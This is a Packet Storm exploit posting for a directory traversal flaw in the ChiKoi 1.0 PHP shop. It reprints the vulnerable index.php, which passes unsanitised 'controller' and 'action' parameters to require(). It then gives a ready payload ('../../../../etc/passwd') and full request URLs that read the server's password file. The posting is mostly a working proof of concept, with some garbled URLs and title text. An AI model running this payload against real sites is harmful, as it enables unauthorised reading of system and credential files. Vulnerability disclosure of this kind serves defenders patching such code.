ChiKoi 1.0 Directory Traversal ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[11] Download^[12]

        ====================================================================================================================================
| # Title     : ChiKoi version 1.0 Directory Traversal Vulnerability Vulnerability                                                 |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | 
| # Vendor    : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0                                              |
| # Dork      :                                                                                                                    |
====================================================================================================================================
poc :
[+]  Dorking İn Google Or Other Search Enggine .
[+]  infested file : index.php & admin.php
<!--
Developed by: TanHongIT
Website: https://tanhongit.com - https://tanhongit.net
Github: https://github.com/TanHongIT
-->
<?php
session_start();
require_once('lib/model.php');
require_once('lib/functions.php');
require_once('content/models/cart.php');
require "lib/statistics.php";
require "lib/counter.php";
// $count_file = 'logs/counter.txt';
// $ip_file = 'logs/ip.txt';
// function counting_ip()
// {
//     $ip = $_SERVER['REMOTE_ADDR'];
//     global $count_file, $ip_file;
//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {
//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;
//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);
//         file_put_contents($count_file, ++$current_val);
//     }
// }
// counting_ip();
if (isset($_GET['controller'])) $controller = $_GET['controller'];
else $controller = 'home';
if (isset($_GET['action'])) $action = $_GET['action'];
else $action = 'index';
$file = 'content/controllers/' . $controller . '/' . $action . '.php';
if (file_exists($file)) {
require($file);
} else {
show_404();
}
[+]  use payload : ../../../../../../../../../etc/passwd
[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd
[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd
== Greetings to :===========================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        
============================================================================================

• Follow us on Twitter^[15]
• Subscribe to an RSS Feed^[16]

File Tags

• ActiveX^[17] (932)
• Advisory^[18] (80,198)
• Arbitrary^[19] (15,803)
• BBS^[20] (2,859)
• Bypass^[21] (1,644)
• CGI^[22] (1,020)
• Code Execution^[23] (6,988)
• Conference^[24] (675)
• Cracker^[25] (840)
• CSRF^[26] (3,297)
• DoS^[27] (22,768)
• Encryption^[28] (2,357)
• Exploit^[29] (50,547)
• File Inclusion^[30] (4,174)
• File Upload^[31] (948)
• Firewall^[32] (821)
• Info Disclosure^[33] (2,679)
• Intrusion Detection^[34] (873)
• Java^[35] (2,950)
• JavaScript^[36] (827)
• Kernel^[37] (6,375)
• Local^[38] (14,244)
• Magazine^[39] (586)
• Overflow^[40] (12,484)
• Perl^[41] (1,419)
• PHP^[42] (5,099)
• Proof of Concept^[43] (2,294)
• Protocol^[44] (3,456)
• Python^[45] (1,472)
• Remote^[46] (30,168)
• Root^[47] (3,524)
• Rootkit^[48] (501)
• Ruby^[49] (598)
• Scanner^[50] (1,633)
• Security Tool^[51] (7,811)
• Shell^[52] (3,116)
• Shellcode^[53] (1,206)
• Sniffer^[54] (889)
• Spoof^[55] (2,177)
• SQL Injection^[56] (16,142)
• TCP^[57] (2,383)
• Trojan^[58] (686)
• UDP^[59] (879)
• Virus^[60] (662)
• Vulnerability^[61] (31,272)
• Web^[62] (9,412)
• Whitepaper^[63] (3,736)
• x86^[64] (946)
• XSS^[65] (17,537)
• Other^[66]

File Archives

• February 2023^[67]
• January 2023^[68]
• December 2022^[69]
• November 2022^[70]
• October 2022^[71]
• September 2022^[72]
• August 2022^[73]
• July 2022^[74]
• June 2022^[75]
• May 2022^[76]
• April 2022^[77]
• March 2022^[78]
• Older^[79]

Systems

• AIX^[80] (426)
• Apple^[81] (1,945)
• BSD^[82] (370)
• CentOS^[83] (55)
• Cisco^[84] (1,917)
• Debian^[85] (6,679)
• Fedora^[86] (1,690)
• FreeBSD^[87] (1,242)
• Gentoo^[88] (4,288)
• HPUX^[89] (878)
• iOS^[90] (337)
• iPhone^[91] (108)
• IRIX^[92] (220)
• Juniper^[93] (67)
• Linux^[94] (44,746)
• Mac OS X^[95] (684)
• Mandriva^[96] (3,105)
• NetBSD^[97] (255)
• OpenBSD^[98] (480)
• RedHat^[99] (12,715)
• Slackware^[100] (941)
• Solaris^[101] (1,609)
• SUSE^[102] (1,444)
• Ubuntu^[103] (8,313)
• UNIX^[104] (9,194)
• UnixWare^[105] (185)
• Windows^[106] (6,525)
• Other^[107]

© 2022 Packet Storm. All rights reserved.